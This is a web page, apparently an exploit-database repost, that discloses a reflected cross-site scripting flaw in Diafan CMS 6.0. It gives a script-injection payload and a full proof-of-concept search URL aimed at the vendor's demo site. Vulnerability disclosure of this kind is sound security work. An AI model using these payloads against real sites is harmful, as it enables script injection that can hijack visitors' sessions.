Home Tools Exploits & CVE's Diafan CMS 6.0 Cross Site Scripting

Diafan CMS 6.0 Cross Site Scripting

June 20, 2023

351

Diafan CMS version 6.0 suffers from a cross site scripting vulnerability.

# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com


Description:

1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button : 
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

Diafan CMS 6.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Relate Learning And Teaching System SSTI / Remote Code Execution

Apache Solr Backup/Restore API Remote Code Execution

PowerVR PMRMMapPMR() Writability Check

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

VMware vCenter Server Analytics (CEIP) Service File Upload

Foloosi Shopping 5.5.7 Insecure Settings

BrainyCP 1.0 Remote Code Execution